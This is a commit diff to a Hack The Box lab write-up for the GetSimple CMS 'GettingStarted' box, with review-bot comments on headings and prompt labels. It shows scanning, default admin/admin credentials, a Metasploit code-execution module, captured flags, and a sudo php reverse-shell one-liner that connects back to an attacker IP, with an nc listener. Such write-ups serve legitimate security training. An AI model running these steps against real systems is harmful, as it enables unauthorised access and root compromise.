~a14m/HTB

8eeec2a1595fbd9216f5131391a2ece60bea664f — a14m 4 months ago 69adea7
Update the readme
1 files changed, 15 insertions(+), 14 deletions(-)

M gettingstarted.htb/README.md
M gettingstarted.htb/README.md => gettingstarted.htb/README.md +15 -14
@@ 25,9 25,9 @@ Service detection performed. Please report any incorrect results at https://nmap
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
```

## 80/tcp
GetSimple CMS
---

## Ports: (80/tcp) GetSimple CMS
### Directory fuzzing
`gobuster dir --url 10.129.168.121 --wordlist /usr/share/SecLists/Discovery/Web-Content/common.txt`



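Review bot: the new heading `## Ports: (80/tcp) GetSimple CMS` uses a plural "Ports:" label for a single port and wraps the port in parentheses, which is harder to scan than the old `## 80/tcp`. Something like `## 80/tcp: GetSimple CMS` would keep the port first while still merging the two old lines into one heading.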
@@ 68,9 68,12 @@ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
#### Credentials

| username | password | note |
| -------- | -------- | ---- |
| admin    | admin    | http://10.129.168.121/admin |

### Metasploit
---

## Metasploit
```
> search getsimple



@@ 86,7 89,9 @@ Matching Modules
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec
```

### Exploit
---

## Exploit
```
> use 1
> set rhosts 10.129.168.121 


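Review bot: `> use 1` in the Exploit block depends on the index from the preceding `search getsimple` output, and that index shifts whenever the module list changes. The full name already shown in the context line above, `exploit/multi/http/getsimplecms_unauth_code_exec`, would keep the step reproducible. The `set rhosts 10.129.168.121 ` line also carries a trailing space.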
@@ 102,20 107,16 @@ $ cat user.txt
> 7002d65b149b0a4d19132a66feed21d8
```

### Privilage escalation
## Privilage escalation
```
$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500                                                     │
        inet 10.10.15.130  netmask 255.255.254.0  destination 10.10.15.130

[parrotOS]$ nc -lnvp 9001
[box]$ nc -lnvp 9001

[box]$ sudo -l
[target]$ sudo -l
User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
[box]$ sudo php -r '$sock=fsockopen("10.10.15.130",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
[parrotOS]$ whoami
[target]$ sudo php -r '$sock=fsockopen("10.10.15.130",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
[box]$ whoami
> root
[parrotOS]$ cat /root/root.txt
[box]$ cat /root/root.txt
> f1fba6e9f71efb2630e6e34da6387842
```
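Review bot: the prompt relabelling in the privilege escalation block changes what `[box]` means. In the old lines it was the target (`[box]$ sudo -l`) and in the new lines it is the attacking host (`[box]$ nc -lnvp 9001`, `[box]$ whoami`), which reads backwards to anyone who takes "box" to be the HTB machine. A pair such as `[attacker]` and `[target]` would be unambiguous. The heading line is touched as well but keeps the "Privilage" misspelling, and unlike the other three sections in this commit it gets no `---` rule above it.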